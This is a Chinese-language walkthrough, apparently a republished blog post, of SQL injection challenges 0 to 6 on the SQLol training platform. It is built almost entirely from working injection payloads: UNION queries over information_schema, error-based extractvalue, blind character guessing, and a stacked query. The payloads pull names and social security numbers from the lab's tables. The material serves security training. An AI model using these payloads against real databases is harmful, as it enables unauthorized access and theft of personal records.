SQL注入测试平台 SQLol -6.challenges挑战
Posted 专注于网络安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入测试平台 SQLol -6.challenges挑战相关的知识,希望对你有一定的参考价值。
SQLol上面的挑战共有14关,接下来我们一关一关来突破。
Challenge 0
目的是让查询返回所有的用户名,而不是只有一个。
SELECT username FROM users WHERE username = 【‘1‘】 GROUP BY username ORDER BY username ASC
注入点在【1】处
构造POC: 1‘ or 1=1# 或者 1‘ and 1=2 union select username from users#
都可以查询到所有的用户名。
Challenge 1
目标是找到数据库中存在的社会安全号码表并提取信息。
SELECT username FROM users WHERE username = 【‘1‘】 GROUP BY username ORDER BY username ASC
注入点在【1】处,我们需要知道有哪些表哪些字段,才能找出所想要的信息,为此,我们使用information_schema进行查表查列。
构造POC:
查出数据库所有的库, ‘ and 1=2 UNION SELECT table_schema FROM information_schema.tables#
选择sqlol库查表, ‘ and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=‘sqlol‘#
选择表,查列, ‘ and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=‘ssn‘#
选择字段,查数据, ‘ UNION SELECT concat(name, 0x7e, ssn) FROM ssn#
到此,已经得到所想要的信息。
Challenge 2
目标是找到数据库中存在的社会安全号码表并提取信息。
SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC
注入点在【1】处,与challenge1类似,所不同的,这是数字型注入,过滤单引号。
构造POC:
查出数据库所有的库,1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#
选择sqlol库查表, 1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=0x73716C6F6C#(0x73716C6F6C是sqlol的Hex编码)
选择表,查列, 1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#(0x73736E是ssn的Hex编码)
选择字段,查数据, 1 and 1=2 UNION SELECT concat(name, 0x7e, ssn) FROM ssn#
到此,已经得到所想要的信息。
Challenge 3
目标是找到数据库中存在的社会安全号码表并提取信息。
无提示,只输出一行,详细错误信息,查询不显示,与challenge 1类似。
构造POC:
‘ UNION SELECT concat(name,‘:‘,ssn) FROM ssn LIMIT 0,1
Challenge 4
目的是找出数据库中存在的社会安全号码表,并提取其信息,无盲SQL注入技术。
提示,有详细的错误,可以使用报错注入
构造POC:
‘ and extractvalue(1, concat(0x5c,(select user())))#
‘ AND ExtractValue(1,concat(0x01,(select concat(name,‘:‘,ssn) from ssn limit 0,1)))#
Challenge 5
目标是找到数据库中存在的社会安全号码表并提取信息。
提示,使用盲注,无输入错误信息
构造POC:
得到数据库的长度: 1‘ or length(database())=5#
逐字猜解ascii码: 1‘ or ascii(mid(database(),1,1))=115#
慢慢猜,总会猜出来的,大致方法就这个。
Challenge 6
目标是创建一个新表称为“ipwntyourdb”使用堆叠的查询。
构造POC:
SELECT username FROM users WHERE username = ‘Herp Derper‘;create table ipwntyourdb( id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC
以上是关于SQL注入测试平台 SQLol -6.challenges挑战的主要内容,如果未能解决你的问题,请参考以下文章
SQL注入测试平台 SQLol -6.challenges挑战